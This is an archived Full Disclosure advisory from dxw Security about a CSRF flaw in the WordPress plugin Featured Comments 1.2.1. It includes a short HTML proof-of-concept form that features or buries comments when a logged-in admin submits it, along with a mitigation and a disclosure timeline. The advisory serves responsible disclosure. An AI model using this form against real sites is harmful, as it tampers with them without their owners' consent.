[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] CSRF in Featured Comments 1.2.1 allows an attacker to set and unset comment statuses (WordPress
From:       dxw Security <security () dxw ! com>
Date:       2014-06-10 12:37:44
Message-ID: 5fe0d702a7293b83941824e85ccd634b () security ! dxw ! com
[Download RAW message or body]

Details
================
Software: Featured Comments
Version: 1.2.1
Homepage: http://wordpress.org/plugins/feature-comments/
Advisory ID: dxw-2014-1360
CVE: Awaiting assignment
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)

Description
================
CSRF in Featured Comments 1.2.1 allows an attacker to set and unset comment statuses

Vulnerability
================
An attacker able to convince an admin to visit a link of their choosing is able to set/unset \
the buried/featured status of any comments.

Proof of concept
================
If a logged-in administrator user clicks the submit button on this form comment with ID of 9 \
will be featured. (In a real attack the form can be made to auto-submit using Javascript). \
<form action=\"http://localhost/wp-admin/admin-ajax.php?action=feature_comments\" \
method=\"POST\">  <input type=\"text\" name=\"do\" value=\"feature\">
  <input type=\"text\" name=\"comment_id\" value=\"9\">
  <input type=\"submit\">
</form>

Mitigations
================
Disable the plugin until a fix is available.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: \
https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third \
party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your \
behalf.

This vulnerability will be published if we do not receive a response to this report with 14 \
days.

Timeline
================

2014-05-22: Discovered
2014-05-23: Email address for report requested via contact form at pippinsplugins.com
2014-05-26: Author acknowledged report
2014-06-10: dxw chased to establish timeline for a fix


Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
          


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic